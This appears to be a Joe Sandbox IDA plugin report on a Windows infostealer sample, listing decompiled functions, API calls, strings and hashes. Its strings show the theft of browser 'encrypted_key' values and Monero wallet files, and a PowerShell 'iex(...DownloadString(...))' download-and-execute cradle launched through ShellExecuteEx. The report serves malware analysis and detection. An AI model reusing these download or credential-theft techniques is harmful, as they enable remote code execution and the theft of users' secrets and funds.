Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: bb45e7a7c81e4b8e4d4c66540969523a58c3f15031543dafd430953b5accd5a7
Instruction ID: 22cbeacaee998f3f382219419313a8bbb4dd35aec0449e82d969cf771927544f
Opcode Fuzzy Hash: bb45e7a7c81e4b8e4d4c66540969523a58c3f15031543dafd430953b5accd5a7
Instruction Fuzzy Hash: 341212719102089ADB09FBA0DD92FDEB778AF34301F908159F586661D1EFB42B4ACF52

Function 001052C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F6280: InternetOpenA.WININET(00110DFE,00000001,00000000,00000000,00000000), ref: 000F62E1
Part of subcall function 000F6280: StrCmpCA.SHLWAPI(?,00CDE928), ref: 000F6303
Part of subcall function 000F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000F6335
Part of subcall function 000F6280: HttpOpenRequestA.WININET(00000000,GET,?,00CDDFC8,00000000,00000000,00400100,00000000), ref: 000F6385
Part of subcall function 000F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000F63BF
Part of subcall function 000F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000F63D1

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00105318
lstrlen.KERNEL32(00000000), ref: 0010532F

Part of subcall function 00108E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00108E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00105364
lstrlen.KERNEL32(00000000), ref: 00105383
lstrlen.KERNEL32(00000000), ref: 001053AE

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Strings

ERROR, xrefs: 001053B9
ERROR, xrefs: 0010546F
ERROR, xrefs: 0010530A
ERROR, xrefs: 00105432
ERROR, xrefs: 001054A9

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 36675c676ce5b88747350e50894b1e986e25769045bcd77057f8b12629b02494
Instruction ID: 2cd8be802fbedff4886ad2f417630284fc6976f03172fee7c4872a5aab6ffef1
Opcode Fuzzy Hash: 36675c676ce5b88747350e50894b1e986e25769045bcd77057f8b12629b02494
Instruction Fuzzy Hash: 2851EC30910248DBDB18FF60CD96EEE7779AF24301F908018F5865A5D2EFB56B45CBA2

Function 001012D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 4a5078b0b5ae1c8cae0e454495f6b1ad43ce0e2cf2220a7ef6462ca4ca1f9f35
Instruction ID: a9c66fe0693b6fad82fcf629b1310c4820b82856a4ec4d7cbb6b96d8d44eb2e2
Opcode Fuzzy Hash: 4a5078b0b5ae1c8cae0e454495f6b1ad43ce0e2cf2220a7ef6462ca4ca1f9f35
Instruction Fuzzy Hash: 54C185B594021DABCB14EF60DC89FEA7378BF64304F004599F54AA72C1DBB4AA85CF91

Function 00104280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00108DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00108E0B

lstrcat.KERNEL32(?,00000000), ref: 001042EC
lstrcat.KERNEL32(?,00CDE538), ref: 0010430B
lstrcat.KERNEL32(?,?), ref: 0010431F
lstrcat.KERNEL32(?,00CDD300), ref: 00104333

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 00108D90: GetFileAttributesA.KERNEL32(00000000,?,000F1B54,?,?,0011564C,?,?,00110E1F), ref: 00108D9F

Part of subcall function 000F9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000F9D39

Part of subcall function 000F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000F99EC
Part of subcall function 000F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000F9A11
Part of subcall function 000F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000F9A31
Part of subcall function 000F99C0: ReadFile.KERNEL32(000000FF,?,00000000,000F148F,00000000), ref: 000F9A5A
Part of subcall function 000F99C0: LocalFree.KERNEL32(000F148F), ref: 000F9A90
Part of subcall function 000F99C0: CloseHandle.KERNEL32(000000FF), ref: 000F9A9A

Part of subcall function 001093C0: GlobalAlloc.KERNEL32(00000000,001043DD,001043DD), ref: 001093D3

StrStrA.SHLWAPI(?,00CDE4A8), ref: 001043F3
GlobalFree.KERNEL32(?), ref: 00104512

Part of subcall function 000F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000F4EEE,00000000,00000000), ref: 000F9AEF
Part of subcall function 000F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000F4EEE,00000000,?), ref: 000F9B01
Part of subcall function 000F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000F4EEE,00000000,00000000), ref: 000F9B2A
Part of subcall function 000F9AC0: LocalFree.KERNEL32(?,?,?,?,000F4EEE,00000000,?), ref: 000F9B3F

lstrcat.KERNEL32(?,00000000), ref: 001044A3
StrCmpCA.SHLWAPI(?,001108D1), ref: 001044C0
lstrcat.KERNEL32(00000000,00000000), ref: 001044D2
lstrcat.KERNEL32(00000000,?), ref: 001044E5
lstrcat.KERNEL32(00000000,00110FB8), ref: 001044F4

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: db3693c1bc4b714b183d4f02b29cfe6264f924da69a56fec26eaae5a0febee08
Instruction ID: 4c49fe3e181ce552995f3aeac302c2a0fd011f1ae313df57d801346bae3b3354
Opcode Fuzzy Hash: db3693c1bc4b714b183d4f02b29cfe6264f924da69a56fec26eaae5a0febee08
Instruction Fuzzy Hash: E27140B6900618ABCB14FBA0DC85FEE777DAF98300F008598F64597181EB75DB49CB91

Function 00106770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00106774
ExitProcess.KERNEL32 ref: 001067A5
ExitProcess.KERNEL32 ref: 001067AF
ExitProcess.KERNEL32 ref: 001067B9
ExitProcess.KERNEL32 ref: 001067C3
ExitProcess.KERNEL32 ref: 001067CD

Strings

*, xrefs: 0010678C

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: e57ed74a4ad5065aa7b3d6adc6dfcaec2bb9aece670e65c373dab41f8eb72a94
Instruction ID: 6494d5c2dde1e1fc0837886c718bb8b197e9f2cfc1f77490119a47313571d154
Opcode Fuzzy Hash: e57ed74a4ad5065aa7b3d6adc6dfcaec2bb9aece670e65c373dab41f8eb72a94
Instruction Fuzzy Hash: 24F08231904209EFD345AFE0E98972C7B78FB04703F140298F699862D0D6704B51DB96

Function 00102C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

ShellExecuteEx.SHELL32(0000003C), ref: 00102D85

Strings

')", xrefs: 00102CB3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00102D04
<, xrefs: 00102D39
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00102CC4

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 2176b1ad881782e9b265d76a3e6f739f15ada4631581145ace4481d52fe51a52
Instruction ID: 4597fa138260ad14c6bf117f9148289ca8c41278a3332a68237b70bf98c15998
Opcode Fuzzy Hash: 2176b1ad881782e9b265d76a3e6f739f15ada4631581145ace4481d52fe51a52
Instruction Fuzzy Hash: 80419071D502089ADB19FBA0C896FDDB774AF24300F908119F196A71D1EFB46A8ACF91

Function 000F9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 000F9F41

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Strings

v10, xrefs: 000F9EA3
ERROR_RUN_EXTRACTOR, xrefs: 000F9E67
@, xrefs: 000F9EF1
v20, xrefs: 000F9E21

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: c01fb0263dad3321098751bcc5c02c8b168cd94dc290baa9313129b806dc0c29
Instruction ID: f37c61d6cee33fa08dfd69893e4fbd3cba14328c59a54be97393cbd8de1e55d7
Opcode Fuzzy Hash: c01fb0263dad3321098751bcc5c02c8b168cd94dc290baa9313129b806dc0c29
Instruction Fuzzy Hash: 12614E70A0020CEBDB24EFA4DC96FEE7775AF55304F408018FA0A5B592DFB46A45CB52

Function 00109260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00CDE100,?,?,?,0010140C,?,00CDE100,00000000), ref: 0010926C
lstrcpyn.KERNEL32(0033AB88,00CDE100,00CDE100,?,0010140C,?,00CDE100), ref: 00109290
lstrlen.KERNEL32(?,?,0010140C,?,00CDE100), ref: 001092A7
wsprintfA.USER32 ref: 001092C7

Strings

%s%s, xrefs: 001092B5

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
